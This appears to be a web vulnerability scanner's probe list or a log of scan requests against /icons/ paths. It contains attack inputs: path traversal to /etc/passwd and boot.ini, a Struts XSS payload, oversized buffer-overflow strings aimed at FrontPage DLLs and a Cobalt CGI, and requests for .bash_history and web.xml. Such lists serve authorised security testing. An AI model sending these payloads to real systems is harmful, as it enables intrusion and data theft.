AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/%2E/small/phpmyadmin/sql.php3?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/%2E/small/phpmyadmin/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/%2E/small/RCS/
/icons/%2E/small/register.htm
/icons/%2E/small/register.html
/icons/%2E/small/register.txt
/icons/%2E/small/registration.htm
/icons/%2E/small/registration.html
/icons/%2E/small/registration.txt
/icons/%2E/small/registrations.htm
/icons/%2E/small/registrations.html
/icons/%2E/small/registrations.txt
/icons/%2E/small/robots.txt
/icons/%2E/small/scripts/iisadmin/bdir.htr
/icons/%2E/small/SELECT%09'aa'%09FROM%09TAB
/icons/%2E/small/servervariables_vbscript.asp
/icons/%2E/small/sitemap.gz
/icons/%2E/small/sitemap.xml
/icons/%2E/small/sitemap.xml.gz
/icons/%2E/small/small.ace
/icons/%2E/small/small.arj
/icons/%2E/small/small.gz
/icons/%2E/small/small.lha
/icons/%2E/small/small.lzh
/icons/%2E/small/small.rar
/icons/%2E/small/small.sln
/icons/%2E/small/small.tar
/icons/%2E/small/small.zip
/icons/%2E/small/sqlnet.log
/icons/%2E/small/sqlnet.trc
/icons/%2E/small/struts-virtdir/<script>alert(xss)</script>.do
/icons/%2E/small/test
/icons/%2E/small/test.asp
/icons/%2E/small/test.aspx
/icons/%2E/small/test.cfm
/icons/%2E/small/test.cgi
/icons/%2E/small/test.dbf
/icons/%2E/small/test.htm
/icons/%2E/small/test.html
/icons/%2E/small/test.php
/icons/%2E/small/test.php3
/icons/%2E/small/test.pl
/icons/%2E/small/test.shtml
/icons/%2E/small/test.txt
/icons/%2E/small/test_page25101.html
/icons/%2E/small/trace.axd
/icons/%2E/small/ViewCode.asp?source=/../../../../../../boot.ini
/icons/%2E/small/WEB-INF./web.xml
/icons/%2E/small/WEB-INF/web.xml
/icons/%2E/small/WFDir2956/
/icons/%2E/small/Winmsdp.exe?source=/../../../../../../boot.ini
/icons/%2E/small/WS_FTP.LOG
/icons/%2E/small/_vti_bin/shtml.dll
/icons/%2E/small/_vti_bin/_vti_aut/dvwssr.dll?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
/icons/%2E/small/_vti_bin/_vti_aut/fp30reg.dll?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/%2E/small/_vti_cnf/
/icons/%2E/sqlnet.log
/icons/%2E/sqlnet.trc
/icons/%2E/struts-virtdir/<script>alert(xss)</script>.do
/icons/%2E/test
/icons/%2E/test.asp
/icons/%2E/test.aspx
/icons/%2E/test.cfm
/icons/%2E/test.cgi
/icons/%2E/test.dbf
/icons/%2E/test.htm
/icons/%2E/test.html
/icons/%2E/test.php
/icons/%2E/test.php3
/icons/%2E/test.pl
/icons/%2E/test.shtml
/icons/%2E/test.txt
/icons/%2E/test_page7274.html
/icons/%2E/trace.axd
/icons/%2E/ViewCode.asp?source=/../../../../../../boot.ini
/icons/%2E/WEB-INF./web.xml
/icons/%2E/WEB-INF/web.xml
/icons/%2E/WFDir20705/
/icons/%2E/Winmsdp.exe?source=/../../../../../../boot.ini
/icons/%2E/WS_FTP.LOG
/icons/%2E/_README
/icons/%2E/_vti_bin/shtml.dll
/icons/%2E/_vti_bin/_vti_aut/dvwssr.dll?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
/icons/%2E/_vti_bin/_vti_aut/fp30reg.dll?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/%2E/_vti_cnf/
/icons/%2E/~README
/icons/%2F/
/icons/%5C/
/icons/-README
/icons/-README.html
/icons/-small
/icons/.access
/icons/.addressbook
/icons/.bashrc
/icons/.bash_history
/icons/.cobalt/alert/service.cgi?service=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA